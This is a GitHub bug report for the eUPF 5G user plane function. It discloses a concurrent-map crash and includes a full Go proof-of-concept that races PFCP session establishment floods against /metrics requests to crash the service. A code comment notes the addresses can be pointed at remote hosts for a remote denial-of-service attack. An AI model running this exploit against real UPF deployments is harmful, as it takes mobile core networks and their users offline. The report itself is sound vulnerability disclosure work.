Skip to content

[Bug]: UPF crash due to concurrent map access in Prometheus metrics collection #634

@LinZiyuu

Description

@LinZiyuu

Describe the bug
UPF crashes due to concurrent map read and write operations when PFCP session establishment requests are processed simultaneously with Prometheus metrics collection requests to /metrics, leading to DoS.

To Reproduce
Steps to reproduce the behavior:

  1. Launch eUPF
sudo docker run -d --privileged --network host \
  -v /sys/fs/bpf:/sys/fs/bpf \
  -v /sys/kernel/debug:/sys/kernel/debug:ro \
  -e UPF_INTERFACE_NAME=lo \
  -e UPF_N3_ADDRESS=127.0.0.1 \
  -e UPF_PFCP_ADDRESS="0.0.0.0:8805" \
  -e UPF_PFCP_NODE_ID=127.0.0.1 \
  -e UPF_API_ADDRESS="0.0.0.0:8080" \
  -e UPF_METRICS_ADDRESS="0.0.0.0:9090" \
  --name eupf ghcr.io/edgecomllc/eupf:main
  1. Start a new go project inside a new folder and create a main.go and paste the code below:
mkdir poc && cd poc
go mod init poc
go get github.com/wmnsk/go-pfcp
  1. Create main.go:
package main

import (
	"context"
	"fmt"
	"log"
	"math/rand"
	"net"
	"net/http"
	"runtime"
	"sync"
	"time"

	"github.com/wmnsk/go-pfcp/ie"
	"github.com/wmnsk/go-pfcp/message"
)

var rnd = rand.New(rand.NewSource(time.Now().UnixNano()))

func main() {
	duration := 500 * time.Millisecond
	// NOTE: These can be changed to remote IPs for remote DoS attack
	// Example: pfcpAddr := "192.168.1.100:8805"
	pfcpAddr := "127.0.0.1:8805"
	metricsURL := "http://127.0.0.1:9090/metrics"
	httpGoroutines := 2

	ctx, cancel := context.WithTimeout(context.Background(), duration)
	defer cancel()

	var wg sync.WaitGroup

	wg.Add(1)
	go func() {
		defer wg.Done()
		syncRace(ctx, pfcpAddr, metricsURL)
	}()

	for i := 0; i < httpGoroutines; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			hammerEndpoint(ctx, metricsURL)
		}()
	}

	wg.Wait()
	log.Println("Optimized race PoC finished; check eUPF logs for concurrent map panic.")
}

func syncRace(ctx context.Context, pfcpAddr, metricsURL string) {
	conn, err := dialPfcp(pfcpAddr)
	if err != nil {
		log.Printf("pfcp dial failed: %v", err)
		return
	}
	defer conn.Close()

	seq := uint32(1)
	if _, err := sendAssociation(conn, seq); err != nil {
		log.Printf("association setup failed: %v", err)
		return
	}

	httpClient := &http.Client{
		Timeout: 200 * time.Millisecond,
	}

	for {
		select {
		case <-ctx.Done():
			return
		default:
		}

		go func() {
			resp, err := httpClient.Get(metricsURL)
			if err == nil {
				resp.Body.Close()
			}
		}()

		seid := rnd.Uint64() | 1
		req := message.NewSessionEstablishmentRequest(0, 0,
			seid, 1, 0,
			ie.NewNodeID("", "", "race-smf"),
			ie.NewFSEID(seid, net.ParseIP("127.0.0.1"), nil),
			ie.NewCreateFAR(
				ie.NewFARID(1),
				ie.NewApplyAction(2), // FORW
				ie.NewForwardingParameters(
					ie.NewDestinationInterface(ie.DstInterfaceCore),
					ie.NewOuterHeaderCreation(0x0100, rnd.Uint32(), "10.200.0.1", "", 0, 0, 0),
				),
			),
			ie.NewCreatePDR(
				ie.NewPDRID(1),
				ie.NewPrecedence(255),
				ie.NewPDI(
					ie.NewSourceInterface(ie.SrcInterfaceAccess),
					ie.NewUEIPAddress(2, fmt.Sprintf("10.60.%d.%d", rnd.Intn(200), rnd.Intn(200)), "", 0, 0),
				),
				ie.NewFARID(1),
			),
		)
		if err := sendMessage(conn, req); err != nil {
		}

		runtime.Gosched()
		time.Sleep(10 * time.Microsecond)
	}
}

func minimalRace(ctx context.Context, pfcpAddr, metricsURL string) {
	conn, err := dialPfcp(pfcpAddr)
	if err != nil {
		return
	}
	defer conn.Close()

	sendAssociation(conn, 1)
	httpClient := &http.Client{Timeout: 50 * time.Millisecond}

	for i := 0; i < 1000; i++ {
		select {
		case <-ctx.Done():
			return
		default:
		}

		go httpClient.Get(metricsURL)
		seid := rnd.Uint64() | 1
		req := message.NewSessionEstablishmentRequest(0, 0,
			seid, 1, 0,
			ie.NewNodeID("", "", "race-smf"),
			ie.NewFSEID(seid, net.ParseIP("127.0.0.1"), nil),
			ie.NewCreateFAR(
				ie.NewFARID(1),
				ie.NewApplyAction(2),
				ie.NewForwardingParameters(
					ie.NewDestinationInterface(ie.DstInterfaceCore),
					ie.NewOuterHeaderCreation(0x0100, rnd.Uint32(), "10.200.0.1", "", 0, 0, 0),
				),
			),
			ie.NewCreatePDR(
				ie.NewPDRID(1),
				ie.NewPrecedence(255),
				ie.NewPDI(
					ie.NewSourceInterface(ie.SrcInterfaceAccess),
					ie.NewUEIPAddress(2, fmt.Sprintf("10.60.%d.%d", rnd.Intn(200), rnd.Intn(200)), "", 0, 0),
				),
				ie.NewFARID(1),
			),
		)
		sendMessage(conn, req)
		runtime.Gosched()
	}
}

func hammerEndpoint(ctx context.Context, url string) {
	client := &http.Client{Timeout: 200 * time.Millisecond}
	for {
		select {
		case <-ctx.Done():
			return
		default:
		}
		resp, err := client.Get(url)
		if err == nil {
			resp.Body.Close()
		}
	}
}

func dialPfcp(pfcpAddr string) (*net.UDPConn, error) {
	raddr, err := net.ResolveUDPAddr("udp", pfcpAddr)
	if err != nil {
		return nil, err
	}
	return net.DialUDP("udp", nil, raddr)
}

func sendAssociation(conn *net.UDPConn, seq uint32) (message.Message, error) {
	msg := message.NewAssociationSetupRequest(seq,
		ie.NewNodeID("", "", "poc-smf"),
		ie.NewRecoveryTimeStamp(time.Now()),
		ie.NewUPFunctionFeatures(0, 0, 0),
	)
	return sendAndReceive(conn, msg)
}

func sendMessage(conn *net.UDPConn, msg message.Message) error {
	buf := make([]byte, msg.MarshalLen())
	if err := msg.MarshalTo(buf); err != nil {
		return err
	}
	_, err := conn.Write(buf)
	return err
}

func sendAndReceive(conn *net.UDPConn, msg message.Message) (message.Message, error) {
	if err := sendMessage(conn, msg); err != nil {
		return nil, err
	}
	respBuf := make([]byte, 4096)
	_ = conn.SetReadDeadline(time.Now().Add(500 * time.Millisecond))
	n, _, err := conn.ReadFromUDP(respBuf)
	if err != nil {
		return nil, err
	}
	return message.Parse(respBuf[:n])
}
  1. Run the PoC:
go run main.go
  1. Check eUPF logs for panic:
sudo docker logs eupf

Expected behavior
The PFCP handler and Prometheus metrics collection handler must use proper synchronization mechanisms (e.g., mutexes, read-write locks, or sync.Map) when accessing shared metrics map structures. Concurrent map read and write operations should be prevented, and the UPF should gracefully handle concurrent requests without crashing.

Logs

fatal error: concurrent map iteration and map write

goroutine 34 [running]:
reflect.mapiternext(0x4a98e9?)
	/usr/local/go/src/runtime/map.go:1392 +0x13
reflect.(*MapIter).Next(0xc000312ee0?)
	/usr/local/go/src/reflect/value.go:2005 +0x74
encoding/json.mapEncoder.encode(...)
	/usr/local/go/src/encoding/json/encode.go:745 +0x334
...
github.com/edgecomllc/eupf/cmd/api/rest.(*ApiHandler).listPfcpAssociationsFull(...)
	/app/cmd/api/rest/pfcp_associations.go:45
...

goroutine 54 [runnable]:
github.com/prometheus/client_golang/prometheus.(*summary).Observe(0xc0000f57a0, 0x4047000000000000)
	/go/pkg/mod/github.com/prometheus/client_golang@v1.18.0/prometheus/summary.go:310 +0x8b
github.com/edgecomllc/eupf/cmd/core.PfcpHandlerMap.Handle(0xc0004ace10, 0xc0000fa380, {0xc0000aa000, 0x7b, 0x5dc}, 0xc0011b6240)
	/app/cmd/core/pfcp_handlers.go:35 +0x413

Environment (please complete the following information):

  • OS: Ubuntu 24.04
  • 5GC kind and version: None
  • UPF version: a8d774a

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions